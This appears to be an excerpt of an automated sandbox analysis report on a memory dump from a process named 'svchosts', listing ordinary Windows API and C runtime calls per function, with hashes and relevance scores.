Part of subcall function 002B8FA5: SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B901D
Part of subcall function 002B8FA5: _abort.LIBCMT ref: 002B9023

Part of subcall function 002BB2AE: _abort.LIBCMT ref: 002BB2E0
Part of subcall function 002BB2AE: _free.LIBCMT ref: 002BB314

Part of subcall function 002BAF1B: GetOEMCP.KERNEL32(00000000,?,?,002BB1A5,?), ref: 002BAF46

_free.LIBCMT ref: 002BB200
_free.LIBCMT ref: 002BB236

Strings

,, xrefs: 002BB22A

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: ,
API String ID: 2991157371-609127500
Opcode ID: 1f88bb8543cc38a52e1c07e15cf8f5c7e6e69bad8e7fe4629ad5db11d6050965
Instruction ID: b29207923b222b3bd57c582b90cf457dc4a3c8536633e44ab5f430433757549e
Opcode Fuzzy Hash: 1f88bb8543cc38a52e1c07e15cf8f5c7e6e69bad8e7fe4629ad5db11d6050965
Instruction Fuzzy Hash: 31313B31920205AFDB11EFA9D845BED77F5EF413A0F254099F8189B291EBB29D51CF40

Function 00299F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0029CC94,00000001,?,?,?,00000000,002A4ECD,?,?,?), ref: 00299F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,002A4ECD,?,?,?,?,?,002A4972,?), ref: 00299F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0029CC94,00000001,?,?), ref: 00299FB8

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 6e63fa2e927b40fc33b5fb04dc98ae5237c23b38752d6d243ea875fa0b08e94e
Instruction ID: 866f327e41d5f146676d2c6b49b5c959534b7a74a62665df4c724ead6f45ff5e
Opcode Fuzzy Hash: 6e63fa2e927b40fc33b5fb04dc98ae5237c23b38752d6d243ea875fa0b08e94e
Instruction Fuzzy Hash: 3A31F6712183069BDF24CF18D848B6AFBA8EB50720F04495DF845DB691CB75DD98CBA3

Function 0029A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A261
GetLastError.KERNEL32(?,?,?,?,0029A113,?,00000001,00000000,?,?), ref: 0029A27E

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 53c31cfeb4003153a74f33dbd5e94b235cd1372a0c8fd00e351b5133b5495fda
Instruction ID: b386d52fbcd169c7f03f3c053488e69094ce37ab271804c039bcca33a3a45107
Opcode Fuzzy Hash: 53c31cfeb4003153a74f33dbd5e94b235cd1372a0c8fd00e351b5133b5495fda
Instruction Fuzzy Hash: 2D01923197031566DF32AF749D09BEE3358AF06B81F044851FC05D5051DB66DA618AE3

Function 002BAFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 002BB019

Strings

, xrefs: 002BB05E

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 4f47ca1944a13a29cb0ad0cfd3a5e88ead33c974248dcda86647c6982d8f9a70
Instruction ID: 37243d67f8fbe008110b98fb55fccf34886bbd8ac35d4b49025e4ada54e5cb87
Opcode Fuzzy Hash: 4f47ca1944a13a29cb0ad0cfd3a5e88ead33c974248dcda86647c6982d8f9a70
Instruction Fuzzy Hash: D44115B052424C9EDF228E288C94BFABBADDB45344F1408EDE59E87142D3B59A55CF20

Function 002BA72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 002BA79D

Strings

LCMapStringEx, xrefs: 002BA73D, 002BA747

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: e35525184753ead53fe40f9cf1cdc18f1d8466965dc56d90eb07617949fc4f51
Instruction ID: 83021b4729925cc4c0540c5732ae2d628783410adcda1eafe0bdb80ddb708a72
Opcode Fuzzy Hash: e35525184753ead53fe40f9cf1cdc18f1d8466965dc56d90eb07617949fc4f51
Instruction Fuzzy Hash: 7D011332524209BBCF029FA0DD05DEE7F76EF08760F018154FE1426160CA728931BF92

Function 002BA6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,002B9D2F), ref: 002BA715

Strings

InitializeCriticalSectionEx, xrefs: 002BA6E5

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 7884cb26c9b33ec7ab6df82639e4539966aeea0b925cce8d795584b0ff7a0e7b
Instruction ID: 363dcf16377099f45f15a985fe8bcd8316a737cc6085451a3e0611d87d49f005
Opcode Fuzzy Hash: 7884cb26c9b33ec7ab6df82639e4539966aeea0b925cce8d795584b0ff7a0e7b
Instruction Fuzzy Hash: 71F0BE3166521CBBCF11AF60DC0ADAEBF75EF45B60B008158FC091A260DE719E70AB91

Function 002BA56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 002BA5AE

Strings

FlsAlloc, xrefs: 002BA58A

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 9428fc03981967ed75892af2b112d4d47a88971eef8599c453b289b5ed70cac4
Instruction ID: 3d894ffad1c51424ed2ccd3ce3b151e1bcc425560e97cd6a9b47dc18a731a4e0
Opcode Fuzzy Hash: 9428fc03981967ed75892af2b112d4d47a88971eef8599c453b289b5ed70cac4
Instruction Fuzzy Hash: C6E05C70B752286B8620AF509C09DEDBB64CF56710B414159FC0917240CD745F219BD6

Function 002B329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 002B32AF

Strings

FlsAlloc, xrefs: 002B329E, 002B32A8

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 3abdd34c6bbfd8a66b530ebab323d2556cd18e5b53dbb227f462d630d52ae82d
Instruction ID: 4def853c1153e1e2bcf5b9bb3e73fa91f2fbf24a7a123303410e8e2d63031c15
Opcode Fuzzy Hash: 3abdd34c6bbfd8a66b530ebab323d2556cd18e5b53dbb227f462d630d52ae82d
Instruction Fuzzy Hash: BAD0C2217A06346A851036846C02EAA7A088A02BF5B450252FE0C1A24284A599B00AC5

Function 002AE1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002AE20B

Part of subcall function 002ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002ADFD6
Part of subcall function 002ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002ADFE7

Strings

3To, xrefs: 002AE1F9, 002AE205

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: a69315327e96953d1a9271f6af6dad724371c1868c8c5e357a02677f83b3f52d
Instruction ID: a9d34e4276cac75bc18a69a09ddc6496ef7d1247130b0add15edd229b3959144
Opcode Fuzzy Hash: a69315327e96953d1a9271f6af6dad724371c1868c8c5e357a02677f83b3f52d
Instruction Fuzzy Hash: 86B012922BE001BF321C11007E07E37032CC4C3F90330812EF606D4480DD804D3A4432

Function 002BB350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 002BAF1B: GetOEMCP.KERNEL32(00000000,?,?,002BB1A5,?), ref: 002BAF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,002BB1EA,?,00000000), ref: 002BB3C4
GetCPInfo.KERNEL32(00000000,002BB1EA,?,?,?,002BB1EA,?,00000000), ref: 002BB3D7

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 1c5d84a2d4835a84b3865c11bb0684359a9f5b9ea3a8bfcea2cf1d13c6636230
Instruction ID: 72b4dd17c04cd2e91a2fdee7028c9f304dbaf9c763e90a0afc9fe981946f0851
Opcode Fuzzy Hash: 1c5d84a2d4835a84b3865c11bb0684359a9f5b9ea3a8bfcea2cf1d13c6636230
Instruction Fuzzy Hash: E25135709202069EDB228F31C890AFBBBF5FF41350F18846ED09687253D7B99951CB91

Function 00291385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00291385

Part of subcall function 00296057: __EH_prolog.LIBCMT ref: 0029605C

Part of subcall function 0029C827: __EH_prolog.LIBCMT ref: 0029C82C
Part of subcall function 0029C827: new.LIBCMT ref: 0029C86F
Part of subcall function 0029C827: new.LIBCMT ref: 0029C893

new.LIBCMT ref: 002913FE

Part of subcall function 0029B07D: __EH_prolog.LIBCMT ref: 0029B082

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4167b1bc14558ecf5770c420aa78a7f1ee7149859a625b4dab55fe8211a5903d
Instruction ID: d8bd76b9adbcf1c815f6c118637498ce1055b8e10828559540200e99356a8923
Opcode Fuzzy Hash: 4167b1bc14558ecf5770c420aa78a7f1ee7149859a625b4dab55fe8211a5903d
Instruction Fuzzy Hash: A84137B0815B419EEB24DF7984859E7FBE5FF19300F504A6ED5EE83282CB326564CB11

Function 00291380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00291385

Part of subcall function 00296057: __EH_prolog.LIBCMT ref: 0029605C

Part of subcall function 0029C827: __EH_prolog.LIBCMT ref: 0029C82C
Part of subcall function 0029C827: new.LIBCMT ref: 0029C86F
Part of subcall function 0029C827: new.LIBCMT ref: 0029C893

new.LIBCMT ref: 002913FE

Part of subcall function 0029B07D: __EH_prolog.LIBCMT ref: 0029B082

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 93a72dc6adee79fb86bc3a52b76b58faf6e55780dbe54b80611733ca3e307339
Instruction ID: 9c2fff408029473d7cb7ae897377feb9259ab14c916a591e046c6c5486a6922e
Opcode Fuzzy Hash: 93a72dc6adee79fb86bc3a52b76b58faf6e55780dbe54b80611733ca3e307339
Instruction Fuzzy Hash: C74146B0815B419EEB24DF798485AE7FBE5FF19300F504A6ED1EE83282CB326564CB11

Function 0029971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00299EDC,?,?,00297867), ref: 002997A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00299EDC,?,?,00297867), ref: 002997DB

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 73e49aaa65b35e7039cca6937c5545bc53ccb4888276ea828d66aadfec0603d4
Instruction ID: 0ff2239f9bc839ef74f7336c9f2144a2bc1cc4c2142880bb5a9ffad172756a59
Opcode Fuzzy Hash: 73e49aaa65b35e7039cca6937c5545bc53ccb4888276ea828d66aadfec0603d4
Instruction Fuzzy Hash: D52104B1420749AFDB308FA8C885BE7B7E8EB49764F00492DF1E582191C775AC948A20

Function 00299D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00297547,?,?,?,?), ref: 00299D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00299E2C

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 3560a998af900b6aa9d85420142ba19aaf34f15c26de62e51deb666e16dc85c7
Instruction ID: 0b5100724108830eb468e0d3e1343cd57f0a83dcefe150c963846e26f18fd16a
Opcode Fuzzy Hash: 3560a998af900b6aa9d85420142ba19aaf34f15c26de62e51deb666e16dc85c7
Instruction Fuzzy Hash: C121F632168346AFCB10EF29C8D1EABBBE8AF52718F04481CB4C183141D729DA5CCB71

Function 002BA458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 002BA4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 002BA4C5

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 23c1c83912eb3b6ab38342dd411e31a9d43d691e5401d0d4e86b30f7d8972e93
Instruction ID: 07a0e20e47e83f6d75c758c6d689492f601f3f9a886c5aa2206b84a47a5986af
Opcode Fuzzy Hash: 23c1c83912eb3b6ab38342dd411e31a9d43d691e5401d0d4e86b30f7d8972e93
Instruction Fuzzy Hash: 8511CA33A315229B9F25DE28FC48CEA73B9AB843A07164120FD15EB254EA74DC61C6D2

Function 00299B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00299B35,?,?,00000000,?,?,00298D9C,?), ref: 00299BC0
GetLastError.KERNEL32 ref: 00299BCD

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 18815b0be196d0519d4ec921be7cff6f4d40abd0940c162a1263b4297b4a48c5
Instruction ID: 863dfd71156ffd27f962d22655bb1b702c9160875369f2de5d004613e4a0bf7b
Opcode Fuzzy Hash: 18815b0be196d0519d4ec921be7cff6f4d40abd0940c162a1263b4297b4a48c5
Instruction Fuzzy Hash: 910108723352069F8F08CE6DBCB497EB399AFC0335B14852DF81687280CA79DC959A21

Function 00299E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00299E76
GetLastError.KERNEL32 ref: 00299E82

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 1ab38a5372686268387dd5de6459cf31ef3d4e2e5fa678fb4630d510a3631161
Instruction ID: 838e61350c8b1b082260cc33c0d0ee2d792faf3b6a0c0d63e8d74f3a56aa0062
Opcode Fuzzy Hash: 1ab38a5372686268387dd5de6459cf31ef3d4e2e5fa678fb4630d510a3631161
Instruction Fuzzy Hash: 2401B5727252015FEF34DE2DDC48B6BB7D99B88325F14493FB186C3690DA71DC988610

Function 002B8606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002B8627

Part of subcall function 002B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002BC13D,00000000,?,002B67E2,?,00000008,?,002B89AD,?,?,?), ref: 002B854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,002D0F50,0029CE57,?,?,?,?,?,?), ref: 002B8663

Memory Dump Source

